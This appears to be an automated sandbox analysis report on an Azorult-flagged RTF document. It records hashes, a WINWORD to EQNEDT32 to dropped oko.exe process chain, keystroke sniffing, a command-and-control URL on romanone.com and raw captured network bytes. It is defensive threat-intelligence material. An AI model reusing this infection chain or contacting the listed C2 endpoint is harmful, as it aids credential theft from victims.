RTF_b54f6f81c118db266fa3d82ca27a9312_doc_2019-08-30_02_30.txt

1.  
2.  
3. * MalFamily: "Azorult"
4.  
5. * MalScore: 10.0
6.  
7. * File Name: "RTF_b54f6f81c118db266fa3d82ca27a9312.doc"
8. * File Size: 8538
9. * File Type: "Rich Text Format data, version 1, unknown character set"
10. * SHA256: "7e6d04a02911f357032f250c91ee5efd90634728d8c1bab5b1e170e30350ad84"
11. * MD5: "b54f6f81c118db266fa3d82ca27a9312"
12. * SHA1: "ec4290119e47c92b1c889c1f447d7656ac03043f"
13. * SHA512: "6ece06df00729e8a6cf0a9b2cc93d0407948fc1f6c5b2c8e14817003d096fe561c30acba6876d983e8b0907910a5f330cd80cf79154b43461c336ac6a730833e"
14. * CRC32: "B95B7451"
15. * SSDEEP: "96:F7BK+vc3OPGasDdZDzOkrXTXTyLAFid2R/nignUv1g+Ax7F:fKec3G69zxoUxngg+Axp"
16.  
17. * Process Execution:
18. "WINWORD.EXE",
19. "svchost.exe",
20. "EQNEDT32.EXE",
21. "oko.exe",
22. "oko.exe",
23. "WmiPrvSE.exe",
24. "explorer.exe",
25. "WMIADAP.exe"
26.  
27.  
28. * Executed Commands:
29. "\"C:\\Program Files (x86)\\Common Files\\Microsoft Shared\\EQUATION\\EQNEDT32.EXE\" -Embedding",
30. "C:\\Windows\\system32\\wbem\\wmiprvse.exe -secured -Embedding",
31. "\"C:\\Users\\user\\AppData\\Roaming\\oko.exe\""
32.  
33.  
34. * Signatures Detected:
35.  
36. "Description": "SetUnhandledExceptionFilter detected (possible anti-debug)",
37. "Details":
38.  
39.  
40. "Description": "The RTF file contains embedded content",
41. "Details":
42.  
43. "embedded content": "Object 2 index 00000032h contains embedded object RgPdTp9y6HGmSEP with size 4096 bytes"
44.  
45.  
46.  
47.  
48. "Description": "Possible date expiration check, exits too soon after checking local time",
49. "Details":
50.  
51. "process": "EQNEDT32.EXE, PID 2276"
52.  
53.  
54.  
55.  
56. "Description": "Attempts to connect to a dead IP:Port (9 unique times)",
57. "Details":
58.  
59. "IP": "52.109.20.1:443"
60.  
61.  
62. "IP": "52.109.20.4:443"
63.  
64.  
65. "IP": "23.60.72.96:443"
66.  
67.  
68. "IP": "151.139.128.14:80"
69.  
70.  
71. "IP": "40.91.122.234:443"
72.  
73.  
74. "IP": "72.21.91.29:80"
75.  
76.  
77. "IP": "163.44.207.86:443 (Vietnam)"
78.  
79.  
80. "IP": "104.18.25.243:80"
81.  
82.  
83. "IP": "23.64.189.123:443"
84.  
85.  
86.  
87.  
88. "Description": "Performs HTTP requests potentially not found in PCAP.",
89. "Details":
90.  
91. "url": "romanone.com:443//wp-content/okoye/32/index.php"
92.  
93.  
94.  
95.  
96. "Description": "A process created a hidden window",
97. "Details":
98.  
99. "Process": "oko.exe -> C:\\Users\\user\\AppData\\Roaming\\oko.exe"
100.  
101.  
102.  
103.  
104. "Description": "HTTP traffic contains suspicious features which may be indicative of malware related traffic",
105. "Details":
106.  
107. "post_no_referer": "HTTP traffic contains a POST request with no referer header"
108.  
109.  
110. "post_no_useragent": "HTTP traffic contains a POST request with no user-agent header"
111.  
112.  
113. "http_version_old": "HTTP traffic uses version 1.0"
114.  
115.  
116. "suspicious_request": "http://romanone.com:443/wp-content/okoye/32/index.php"
117.  
118.  
119.  
120.  
121. "Description": "Performs some HTTP requests",
122. "Details":
123.  
124. "url": "http://romanone.com:443/wp-content/okoye/32/index.php"
125.  
126.  
127.  
128.  
129. "Description": "The RTF file has an unknown character set",
130. "Details":
131.  
132.  
133. "Description": "Sniffs keystrokes",
134. "Details":
135.  
136. "SetWindowsHookExW": "Process: explorer.exe(2004)"
137.  
138.  
139.  
140.  
141. "Description": "A document file initiated network communications indicative of a potential exploit or payload download",
142. "Details":
143.  
144. "http_request": "winword.exe_WSASend_\\x17\\x03\\x01\\x01p\\x1e\\x0fo\\xafaq\\xf3\\\\xeas\\x1e3\\xe6\\x9c\\x08\\x1c\\x05\\x185dqs\\x91\\x17\\xfej\\x84>i\\x14\\xd8\\x16\\xef\\xee8\\xe1x\\x17v\\xd0\\x15\\x91-\\xe4p\\x96\\x17q,\\x99/\\xe6\\x9a#x\\xbdsdr9\\xf4\\x1a\\x19cd\\x89\\xae\\xf3\\xf4\\x91\\x9d\\x14b-?\\xc3\n\\xffr\\xf1\\xc8|t\\x08u\\x03s\\xce\\xac\\x98\\x0f9\\xa7\\xb8x\\x97\\x0b-\\xa8\\x11\\xbe\\x12\\xdbp\\xa6cd\\x13)`\\xc4>\\xc3\\xa1\\x86i\\xf7\\x86\\x8b\\xc1\\xc8.\\x95j\\x04\\xee\\xdf\\x11\\x88\\x87\\xc2hw\\xfdl+>\\x1bs,m?\\xa6\\x17\\xf8\\xcfm'&\\xe7~\\xaf\\x9d\\x17lg\\xb7\\x0e\\x18 \\xffdd6\\xd4\\x94\\xaf\\xb3\\xb9g2\\xc7\\x14\\xf9\\x92\\x98s*\\xd1\\x83v\\x1f\\xc3\\x97\\x1e\\x7f\\xd3\\xae^\\x1a\\xe8\\xe6\\xbc\\xc2w\\xcd\\xd7\\xaf\\xbbn_\n\\x8c\\x83 \\xc9v\\x10\\xc9\\xa8w\\x0f\\xb5\\xfa(j\\x8e\\x04\\xf8\\xd3\\xc9\\xda&\\x0bwc\\xd4\\xda&\\xf4\\xfd\\xab\\xe2\\xae\\xd0\\xbdv\\xcf\\x12|t\\xfb?\\xc3\\xd7f\\x01"
145.  
146.  
147. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00~\\x01\\x00\\x00z\\x03\\x01h\\x81m\\x90u\\xa3\\xc8\\x11\\xbc\\xd4n'\\xc2\\xd7\\xf7m'<.\\xf6gmb2\\xd5`\\xa1\\x90z\\x06\\x00\\x00\\x18\\x00/\\x005\\x00\\x05\\x00\n\\xc0\\x13\\xc0\\x14\\xc0\t\\xc0\n\\x002\\x008\\x00\\x13\\x00\\x04\\x01\\x00\\x009\\xff\\x01\\x00\\x01\\x00\\x00\\x00\\x00 \\x00\\x1e\\x00\\x00\\x1broaming.officeapps.live.com\\x00\n\\x00\\x06\\x00\\x04\\x00\\x17\\x00\\x18\\x00\\x0b\\x00\\x02\\x01\\x00"
148.  
149.  
150. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00f\\x10\\x00\\x00ba\\x04\\x04jd~\\x80\\x9c\\x03\\xc0\\xd6$x\\xdf\\xa6\\xf2tmj6o\\xd9\\x100\\x112\\xe2\\x90;\\xc6\\x17rro\\xcb\\x97\\xec\\x80f\\x0f8\\xc6_nc=_j\\x0eb\\xb6\\xe2$\\xd4\\xfb\\xc2s\\xc3\\xccf\\xfbk\\xa08\\x14\\x03\\x01\\x00\\x01\\x01\\x16\\x03\\x01\\x000w\\xb5\\xae\\xce\\x8f\\x9c'\\x03t\\xb0z8\\x88\\x1cv\\xbfd7\\x8f\\xa2_r\\xe7m\\xf4\\x1ez\\xe0l\\xb62\\x11\\xbd`7\\xfb\\x9ej\\x90t\\xd2qe\\x9f\\xc6\\x8d\\xc36"
151.  
152.  
153. "http_request": "winword.exe_WSASend_get /mfewtzbnmeswstajbgurdgmcgguabbtbl0v27rvz7lbduom%2fnyb45spuewqu5z1zmijhwmys%2bghunoz7oruetfaceai4elabvpzalrznpjlrv1u%3d http/1.1\r\nconnection: keep-alive\r\naccept: */*\r\nuser-agent: microsoft-cryptoapi/6.1\r\nhost: ocsp.digicert.com\r\n\r\n"
154.  
155.  
156. "http_request": "winword.exe_WSASend_get /mfqwujbqme4wtdajbgurdgmcgguabbrpc1vzt9qvn7bzy3iidtbhla4mkqquwiif1tycsck3fd7%2fhijo5ox%2f%2bn0ce3saagyvv14%2fmepdgh0aaaaabk8%3d http/1.1\r\nconnection: keep-alive\r\naccept: */*\r\nif-modified-since: sat, 23 mar 2019 17:46:18 gmt\r\nif-none-match: \"dd54d75d468"
157.  
158.  
159. "http_request": "winword.exe_WSASend_\\x17\\x03\\x01\\x01p\\xf8\\x93\\xea\\xd7\\x9c\\xd9\\x96-\\x8c\\x98\\xb8\\x1b`\\xdf\\xde!\\xb5,;j\\x0c\\xfaiuk\\xbd\\x0b~\\xf3s\\x11\\xad\\x00\\xc0n\\xfd\\x0b<8\\x9b<a3\\xc4\\xd5\rr=s\\x9a\\x83\\x0e\\x831\\x12\\xb5\\xb7\\xf3=y\\xb2$\\xaec\\x10\\xf44\\xd9kv\\xda\\xbc\\xd1c\\x06\\x93m\\x9e7dl\\x8bd\\x14&\\x91\\xca4\r\\xbe0\\xb4\r\\xb3\\xdc6\\x15\\xdf\\x88\\xfe\\x82.\\xeb\\xbf\\xc9\\xb0yx\\x1e\\xd2\\xa0\\xe1\\xe3\\xf4\\x1c\\xb1\\xce\\xf4\\x1a\\x0e\\xde2\\x91\\xbc7\\x19\\x15fc`\\xdc\\xd0a\\x87\\x96\\x1d\\xb2%\\x16t\\xf9\\x17\\xc9\nse\\xfd\\xf5\\xaa\\xd7\\xf4g\\xf26\\xbf/-\\xf7 \\xc8\\x91\\xfd\\x91\\xb3i\\x00\\xf3k\\x0b\\xb4\\x15)\\xcd\\x05\\xc3t$\\x8f?y\\x08\\x0e\\x9c\"\\x19\\x1c\\xe2ke\\xf8i\\xb9\\xaez\\xd6\\x14=\\xa0\\x8f7\\x9aw\\x9a9\\x7f\\x86jo\\x1b0\\x97x\\xe7q\\xfe\\xc0`\\xa7\\x9b\\x08t\\xf1\\xd3\\x8d-j\\xd8\\x15:\\x1a\\xc3b>\\xd1\\xdc\\xa7\\x9ap\\xdb) `\\xcc_\\xc1"
160.  
161.  
162. "http_request": "winword.exe_WSASend_\\x17\\x03\\x01\\x02 `\\xe4\\x1c\\xf3i\\xcck\\x93\\x11\\\\x86\\x8c\\x96\\x08\\x15\\xb2fs\\xb2\"\\xb0\\xbf\\xaf\\x03\\x83\\xa2/o\\xaa\\x8c\\xbd\\x9f\\xf1\\xabw\\xdd7\\xe8\\xdf\\\\x88\\x83\\x83\\xb4w\\x81c.\\xa5\\x1f\\x82\t\\x85\\xcd\\x9b,\\x8cb\\xaf\\xa7\\xa6w\\xa7\\xef\\xee\\xd1-pk>\\xa7\\xaen,\\xeb\\xbc\\x98,\\xa8\\xf3\\x9a\\x91\\x1dm\\x98\\x06!\\x02\\xcd\\x80p\\x92\\x125\\xa3\\x06\\xcc\\xc9\\xcfz\"ra\\xed\\oy!j\\xcfu\\x10@\t\\x01e\\xdd\\x03mb\\xab\\xb4-\\x8ab!\\xc6\\x98\\xd2\\xdbh\\x9a\\x18\\xf43\\x86frk\\x0eh\\x15\\x06\\x1303a.hms&lb\\x0ew\\xfc\rh.\\xa4\\x01+\\x0b\\xb8owqk\\x8d\\x97\\xe2\\x18\\xa6#gl\\x062\\x9a=5z\\xff \\x89r\\x83\\x0c\\xc0\\x19\\x9ab\\xa0\\xbcv\\x93\\xc04\\x07yy\\xcc\\xf3\"\\xb84\\xe9?+\\xb5j\\x9d\\x9aci\\xac\\xd6(\\xcau\\x17\\xb0\\x1b\\xfb\\x0e\\xd3\n\\xdd\\xbca\\x1e\\xb3j\\x8c\\xb1\\xa2\\x17\\xf6\\xe0\\xd5\\x14ua\\xab\\x0c"
163.  
164.  
165. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00z\\x01\\x00\\x00v\\x03\\x01h\\x81\\x84f\\x1f\\xeb\\xae\\x0e\\x8du\\xbd\\x0fu\\x997\\xfd\\xdd>y\\xc3\\xcd,\\x1fmi\\xb9h\\xdb\\x00\\x00\\x18\\x00/\\x005\\x00\\x05\\x00\n\\xc0\\x13\\xc0\\x14\\xc0\t\\xc0\n\\x002\\x008\\x00\\x13\\x00\\x04\\x01\\x00\\x005\\xff\\x01\\x00\\x01\\x00\\x00\\x00\\x00\\x1c\\x00\\x1a\\x00\\x00\\x17odc.officeapps.live.com\\x00\n\\x00\\x06\\x00\\x04\\x00\\x17\\x00\\x18\\x00\\x0b\\x00\\x02\\x01\\x00"
166.  
167.  
168. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00f\\x10\\x00\\x00ba\\x04\\xba\\xbe\\xcevt\\xb2\\xf3\\xd9a\\x18\\xb5c*\\x8c\\x1d\\xbc\\x8d`\\xb5\\xa7e,m\\xca\\x92m\\xb1\\xea\\x90\\x94\\x1a\\xa7l-\\x88\\x82r\\xe3ic\\xb7\\x95\\xea\\xee\".bs\\xf2\\x08\\xdb\\x0c\\xb9tv\\xc3\\x90\\x04\\x1f \\xc6\\x82\\x00\\x14\\x03\\x01\\x00\\x01\\x01\\x16\\x03\\x01\\x000\\x1e\\xa2z!\\x92\\x9f\\xbe8\\xd9t\\x8fm\\x9d\\x83\\xfd\\xab\\xd9\\x80sv\\xecx\\x82\\xa1\\xfd\\xfb\\x0c\\xd5\\xc5\\x12.\\xcd\\xe3v\\x07\\x81\\xb1\\xee\\x80ss2\\x92\\xa9\\xbb\\xa5\\g"
169.  
170.  
171. "http_request": "winword.exe_WSASend_\\x17\\x03\\x01\\x01p\\xb4\\xa6\\x15\\xbdf\\x8az\\x16\\x07o\\xcf\\xb5\\xde\\xd7\\x0f\\xe6\\xc4\\xd8>\\x14!hi\\xf2\\x04\\x0e\\x9c%\\xf0y\\xb7o\\xb1\\xc1|\\x0f\\xb2\\x99\\x9b\\xcex\\x04\\xa4\\x15\\xc9i\\xa8y\\xa9_\\x82bef\\xc8\\xf2m(\\x11\\x99^\\xc2\\xfdk\\x93\\xebt\\xc6g6\\x91/\r\\x92u\\xdcrr\\x0f\\xef|\\x9fas\\xd6)\\xb9\\xbd\\xeac\\xd0\\xcd\\xa8\\xde\\xd2\\xbdm\\xc4\\xf9o\\x00n\\x7f\\xd2x_\\xe5\\xcb\\xe2\\xb1#\\xf9\\xf4\\xc1c\\xa2\\x9as\\xb7s\\xbc\\x1f\\xa2\\x8a\\x0b\\x89\\x07\\x00\\xc7\\x0c\\xea\\x95\\x05\\xe5?\n\\x94\\xeb\\x98\\xe1\\xbd1&\\xf6\\x10\\xb3f\\xc1\\x93\\x9c!\\xc8\\x8b\\xc8\\xef\\x8as\\x82\\x9e\\xbf\\xd6\\xd1\\xbeg\\xfc\\x05\\x04\\xe0\\x14\\x7f4\\x12\\xb0\\x9fw\\xd5\\xc0qm\\xcbn\\xbbie;s;%\\xabt\\xde\\xb9\\xe9\\x84k\\x9csu\\x1e\\x1c\\xa4\\xaf\\xa8\\x9f\\x04\\x13\\xd6j\\x17\\x8azb\\xb9\\x97\\x1f\\xb8\\xf5\\x1c\\xbd\\xb8\\xce\\x90\\x93\\xb5\\xbc\\x9f\\x9f\\x84\\xb8\\xea\\x93\\x1a\\xcd\\xba\\x19\\x90~po\\xd7\\xb2\\xf4\\x03\\xe2\\x02\\xe3q\\x07\\x8a"
172.  
173.  
174. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00\\x7f\\x01\\x00\\x00\\x03\\x01h\\x81\\x8c\\x84\\x06\\x8f\\x17\\x8cr\\x8f\\xc1f!\\x9e\\xd5qu\\xc3\\xaa\\x96\\xe5dt\\xa30\\x00\\xd0\\x05\\xcdu\\xb7\\x00\\x00\\x18\\x00/\\x005\\x00\\x05\\x00\n\\xc0\\x13\\xc0\\x14\\xc0\t\\xc0\n\\x002\\x008\\x00\\x13\\x00\\x04\\x01\\x00\\x00:\\xff\\x01\\x00\\x01\\x00\\x00\\x00\\x00!\\x00\\x1f\\x00\\x00\\x1cactivation.sls.microsoft.com\\x00\n\\x00\\x06\\x00\\x04\\x00\\x17\\x00\\x18\\x00\\x0b\\x00\\x02\\x01\\x00"
175.  
176.  
177. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00f\\x10\\x00\\x00ba\\x04%+\\xb9\\xfc\\xe5\\xc8\\xcd\\xefr8\\xc0\\x8cv(n\\xd8\\xd1o\\xb1\\xedi\\xd2\\xdau\\xec\\xe1\\xb4m\\xbao\\xa3\\xc6\\xccc\\xaf\\x00\\x8f\\x84\\xdb\\xbeb\\xa2m\\x02\\x14vz\\xee\\xc6\\x1f\\xfb;i\\xe8\\x997f2b\\x0c4\\xe4\\x11\\x14\\x03\\x01\\x00\\x01\\x01\\x16\\x03\\x01\\x000$na\\xed\\xfd\\x9d\\x87\\xbd5s\\x8b\\x07\\xd2%\\x08\\x80\\xc4)\\xd3\\xb4\\xf7\\xb9\\xb2>\\x99\\xe1\\x89\\xdf\\xd7m\\xf6(\\x1bh\\xfax\\x1d\\xb6w\\xcb\\x17#\\xbb\\xeerb\\xac"
178.  
179.  
180. "http_request": "winword.exe_WSASend_\\x17\\x03\\x01\\x01`\\x00\\xaf\\x15\\x84\\xea\\xfc\\xff\\xd2\\xa6\\xd8\\xe6\\xa0hz\\xcb+\\x13\\x1d\\xdb\\xf7.nq\\xf6?7z,o\\x10n\\xf4\\xa3\\xde1\\x1f\\x8f\\xb4\\xc0\\x9b\\xf1\\x8e\\xb2q\\x04\\x1d\\xdb\\x14`e|1\\xf7\n\\x90=\\x02i\\xf5r\\xbd6\\xe9\\xd79\\xd4\\x05\\xd6\\xc3%g\\x8e\\xfa4<~\\xf0\\x82.\\x06\\xbc\\x9dv\\xd5\\x14\\xb1p\\xe5\\xa0#\\xaf\\x07\\\\xcc\\x05\\xc3\\xa5\\xe3g|\\xf6\\xb9ow\\x184\\x18\\xc7\\x9f\\xbd(\\xbe\\xc0\\xee\\xf5\t\\xb6&?k?/tqlr\\x17\\x90\\xf8\\xf5@\\x98\\x81\\x1e\\xc0\\xe3\\x8e3np\\x8e\\x9e\\xd2j#\\x0e\\x10\\xe1p\\x8a\\xd7h\\xe4\\xe8\\xb4\\xf5\\x9b\\x9e\\xb0\\x03d\\xdf\\x8f\\xee\\x87n\\xa5\\x82\\xb2\\x92co\\xfe\\x8a\\x925\\x99g|a\\xa0\\x82\\xd3\\x02\\xe5+h\\xf5p\\x88\\x8b\\xfa\\x1c+*\\xcfp\\xb1\\xf0\\xe8\\x01\\xda\\xc9\\xd5\\xc4\\xdd\\xe3\\x909\\x84yl\\x93\\x05\\x03\\xe4:\\xb7\\xd3\\x9a\\xf2\\xe9\\xb2\\x1f+38n\\x16\\x92\\x08\\x16\\x95\\xc90\\xbd\\x0b\\x15\\x83\\x97\\xa0\\xa7\\xa7\\xf9\\x91z\\xdf"
181.  
182.  
183. "http_request": "winword.exe_WSASend_\\x17\\x03\\x019p\\x99\\xff\\xa8\\x86\\xdeq&\\x0b\\xf95\\xbf\\x83\\xc7\\x7f-c\\\\xce\\xbc\\xa1k\\xc4o\\xa54?\\xd1\\xc0\\x12 8`w\\xe8'\\xbc\\xee\\x10\\x1e\\xc7!\\xa1\\x90\\x0b\\x07d4\\xb9\\x9f\\xef\\xe7+\\x82\\xce\\xdd\\xadrh\\xb9\\xcc~i\\xf9<+\\x83/\\x9ei\\x07\\x8ey\\xef\\x8c\\xe3\\xbdy8i\\x99\\xf2\\x13\\xc2\\x04z\\xb8\\xc5\\xf8js\\xf9\\xc5\\xcen\\x18\\x86\\x03\\x13\\xf5\\xa2\\xea>\\\\x83y\\x0c>=\\xbd\\x0f\\xab\\xa3*n\\xf9\\x832|\\x8a_\\x90uh&\\xac\\xaf\\xb8\\xd15\\xc2\\xb3\\x0b\\xbb*a\\xfa^\\x80\\x96o\\x7fh\\xc51\\xber\\x10\\xf2\\xebt\\x08l\\xef\\xae\\xa8\\x9f\\x00\\xbf\\xf1\\x1a\\x9b\\xe3k\\x844\\xa6\\x93\\xff\\xe3\\xb5\\x0cj\\x89\\xa4\\xb6i\\xec\\x82\\xbf\\x93'\\x8ch\\xcan\\xbd7\\x98\\xe3\\x8c=\\xd8\\xd1i2\\xc3\\xe8\\x19\\xb1\\x93\\xcbn\\xd2b\\xd6\\x15&\\x85\\x96w\\xc6\\xe6\\xdd\\xa3\\xa9c\\xe7c\\xd7\\xf1\"\\xac\\xe4\\x92\\xde\\\\x98\\xf18\\xb9\\x8e\\xa0a5+33\\x86,\\x01\\xc4r\\xdcvtq\\x12h\\xf8."
184.  
185.  
186. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00\\x01\\x00\\x00y\\x03\\x01h\\x81\\x91\\x07m\\xc9<\\xde\\xd2<\\x9b\\xc2\\x8fh#\\\\x9f\\xb1\\xe2\\x91`\\x1a\\xba\\xdd,b\\xf4j\\x15\\x14\\xee\\x00\\x00\\x18\\x00/\\x005\\x00\\x05\\x00\n\\xc0\\x13\\xc0\\x14\\xc0\t\\xc0\n\\x002\\x008\\x00\\x13\\x00\\x04\\x01\\x00\\x008\\xff\\x01\\x00\\x01\\x00\\x00\\x00\\x00\\x1f\\x00\\x1d\\x00\\x00\\x1atemplateservice.office.com\\x00\n\\x00\\x06\\x00\\x04\\x00\\x17\\x00\\x18\\x00\\x0b\\x00\\x02\\x01\\x00"
187.  
188.  
189. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00f\\x10\\x00\\x00ba\\x04\\x862\\xd4\\x9b\\x99_\nqq\\xfe\\x00\\xed# r\\xf0\\xfb\\x17\\x93\\x9f\\xa0\\x0f\\xae~r+\\x08\\xf4\\x8d\\xaeu\\xf9%\"\\xa8ah\\xf0\\x04+\\x1f\\xdap\\xc8\\xb5\\x03y\\xb5\\x91v\\xb8\\xbf\\xc3\\x95\\xe4jb\\x81\\x9c\\x9d\\x15\\xc9\\x14\\x03\\x01\\x00\\x01\\x01\\x16\\x03\\x01\\x000\\x89\\x05\r\\xa3\\xea\\x19\\x8a\\xfa\\xad\\xc9j\\x1c\\xedi\\xf0>\\xe5\\xb9\t\\x87q\\xbe\\xc2\\xbaj\\xee\\x85\\xf3\\xca\\x02bwg\\xa7s\\xe2p\\xb7\\x9c\\x91\\xack\\x9e\\xe7\\x13\\xf7|"
190.  
191.  
192. "http_request": "winword.exe_WSASend_\\x17\\x03\\x01\\x01plz4xo\\xf2wy\\xbfj2\\x14\\x8a\\xe4\\x01\\xc7\\xfd\\xf7\\x99\\x11\\xa3\\x9c\\xea\\x96\\xffo\\x92\\x82u\\xa6/\\x17\\xeac\\x96k\\x9d\\xba\\xa4@\\x16\\x91h\\x96x\\xe8^\\xbb\\xbc\\x0e\\xbb\\x98\\xe3\\xa0-\\xf5\\xe1\\xady\\x8ae\\x1d\\xdcd\\xe9\\xa7\\xffg\\xf41\\xae\\xf5\\xd5\\xd2\\xd6\\xe7\\xde\\x87\\xaa~;t\\x92y\\xf5nsvz9(6\\x87\\xebi jtry-\\xc8\\xd2\\xecjic\\x14\\xc3\\x04\\xc0\\xcd\\x13\"\\xcb\\xae\\xca\\xf2\\x867a\\x9d.2\\xb4\\x9c\\xfd\\x06\\x91\\xd7\\x03\\xdd\\xac\\xfa\\x0c\\xf0\\x94\\xc9\\x19\\x10\\xe9\\xb8\\x99\\xeb\\x85\\x9b\\x8b\\xd3=\\xd7\\x18\\x80(#\\xac9\\x93\\x08\\xc3!s\\xe9\\xe1^8\\xa3\\x94^\\xae\\xb0\\x00\\x83vj\\x86xzw\\x85\\x84\\xd8\\x8e\\xa96\\xd9k,\\x1a\\x11\\x03\\xbc\\xb3%\\xfdk\\x10\\xd8\\xfb.e9e\\x9d\\x00<@\\xb8r\\xa2\\xa3\\xac\\xbe\\xde\\xfc\\xc9\\x9fi\\xd67%p\\xd9\\xc8\\x08z\\xae\\xbc`\\xa9\\xc7\\xa5bwq\\xe4\\xf0\\x1f\\xbc\\xa1d\\x88\\xa8\\xd6r\\xee\\xecr"
193.  
194.  
195. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00\\x83\\x01\\x00\\x00\\x7f\\x03\\x01h\\x81\\x921\\x00\\xfaag<\\xca\\xb6\\xc0\\xf1\\x8d\\xbapq\\xfc\\x15\\x0f.gyq|h\\xb1\\x9a| \\x1e\\x00\\x00\\x18\\x00/\\x005\\x00\\x05\\x00\n\\xc0\\x13\\xc0\\x14\\xc0\t\\xc0\n\\x002\\x008\\x00\\x13\\x00\\x04\\x01\\x00\\x00>\\xff\\x01\\x00\\x01\\x00\\x00\\x00\\x00%\\x00#\\x00\\x00 omextemplates.content.office.net\\x00\n\\x00\\x06\\x00\\x04\\x00\\x17\\x00\\x18\\x00\\x0b\\x00\\x02\\x01\\x00"
196.  
197.  
198. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00\\x83\\x01\\x00\\x00\\x7f\\x03\\x01h\\x81\\x92\\x83*'\\xcf\\xd6|\\x18 \\xde\\xe7g\\x1d|\\xff\\x1a\\xa2\\x89\\xe0\\xb6u\\x1e\\x89\\xf5;\\xf8\\x99\\x136\\x00\\x00\\x18\\x00/\\x005\\x00\\x05\\x00\n\\xc0\\x13\\xc0\\x14\\xc0\t\\xc0\n\\x002\\x008\\x00\\x13\\x00\\x04\\x01\\x00\\x00>\\xff\\x01\\x00\\x01\\x00\\x00\\x00\\x00%\\x00#\\x00\\x00 omextemplates.content.office.net\\x00\n\\x00\\x06\\x00\\x04\\x00\\x17\\x00\\x18\\x00\\x0b\\x00\\x02\\x01\\x00"
199.  
200.  
201. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00\\x83\\x01\\x00\\x00\\x7f\\x03\\x01h\\x81\\x92i\\x82,:\\xf1\\x11\\x8a\\x81\\xb7\\xd40\\xce\\xb5\\xdf\\xbc\\xa7j't\\xf7(\\x0e\\x98\\xa5\\x0f\\x9bl\\x00\\x00\\x18\\x00/\\x005\\x00\\x05\\x00\n\\xc0\\x13\\xc0\\x14\\xc0\t\\xc0\n\\x002\\x008\\x00\\x13\\x00\\x04\\x01\\x00\\x00>\\xff\\x01\\x00\\x01\\x00\\x00\\x00\\x00%\\x00#\\x00\\x00 omextemplates.content.office.net\\x00\n\\x00\\x06\\x00\\x04\\x00\\x17\\x00\\x18\\x00\\x0b\\x00\\x02\\x01\\x00"
202.  
203.  
204. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00\\x83\\x01\\x00\\x00\\x7f\\x03\\x01h\\x81\\x92\\x05\\xa3\\xd1\\xdd\\x8b\\xa8\\xea\\x1d\\x9f\\xdf\\x0ct\\xc0\\x058s^1<\\xe6\\x08\\x17\\xf8r\\xb7\\x7f`\\xa9\\x00\\x00\\x18\\x00/\\x005\\x00\\x05\\x00\n\\xc0\\x13\\xc0\\x14\\xc0\t\\xc0\n\\x002\\x008\\x00\\x13\\x00\\x04\\x01\\x00\\x00>\\xff\\x01\\x00\\x01\\x00\\x00\\x00\\x00%\\x00#\\x00\\x00 omextemplates.content.office.net\\x00\n\\x00\\x06\\x00\\x04\\x00\\x17\\x00\\x18\\x00\\x0b\\x00\\x02\\x01\\x00"
205.  
206.  
207. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00\\x83\\x01\\x00\\x00\\x7f\\x03\\x01h\\x81\\x92?\\x85\\xe9x\\x15,\\xff\\x88\\x832\\xe0\\x92c\\x01\\x84\nn\\x11\\x05l9\\xebj\\xa8\\xd0\\x86\\xef\\xa2\\x00\\x00\\x18\\x00/\\x005\\x00\\x05\\x00\n\\xc0\\x13\\xc0\\x14\\xc0\t\\xc0\n\\x002\\x008\\x00\\x13\\x00\\x04\\x01\\x00\\x00>\\xff\\x01\\x00\\x01\\x00\\x00\\x00\\x00%\\x00#\\x00\\x00 omextemplates.content.office.net\\x00\n\\x00\\x06\\x00\\x04\\x00\\x17\\x00\\x18\\x00\\x0b\\x00\\x02\\x01\\x00"
208.  
209.  
210. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00\\x83\\x01\\x00\\x00\\x7f\\x03\\x01h\\x81\\x92x\\x9d\\xfa\\x0f\\x8c\\x1f+\\xbck\\x14n\\xdf\\xabc\\xe4x\\x1d\\xfd~42\\xc0\\x98\\x88\\xe6\\xeb\\x12\\x9b\\x00\\x00\\x18\\x00/\\x005\\x00\\x05\\x00\n\\xc0\\x13\\xc0\\x14\\xc0\t\\xc0\n\\x002\\x008\\x00\\x13\\x00\\x04\\x01\\x00\\x00>\\xff\\x01\\x00\\x01\\x00\\x00\\x00\\x00%\\x00#\\x00\\x00 omextemplates.content.office.net\\x00\n\\x00\\x06\\x00\\x04\\x00\\x17\\x00\\x18\\x00\\x0b\\x00\\x02\\x01\\x00"
211.  
212.  
213. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00\\x83\\x01\\x00\\x00\\x7f\\x03\\x01h\\x81\\x920\\\\xa8\\x0c\\x85\\x86\\xb2\\x1f\\xc9\\x92\\x8b\\xc7\\x98\\xc6\\xbb\\xe7\\x0e%\t\\xd7\\x99j\\xe3-g\\xaf\\xa2\\xdc\\x00\\x00\\x18\\x00/\\x005\\x00\\x05\\x00\n\\xc0\\x13\\xc0\\x14\\xc0\t\\xc0\n\\x002\\x008\\x00\\x13\\x00\\x04\\x01\\x00\\x00>\\xff\\x01\\x00\\x01\\x00\\x00\\x00\\x00%\\x00#\\x00\\x00 omextemplates.content.office.net\\x00\n\\x00\\x06\\x00\\x04\\x00\\x17\\x00\\x18\\x00\\x0b\\x00\\x02\\x01\\x00"
214.  
215.  
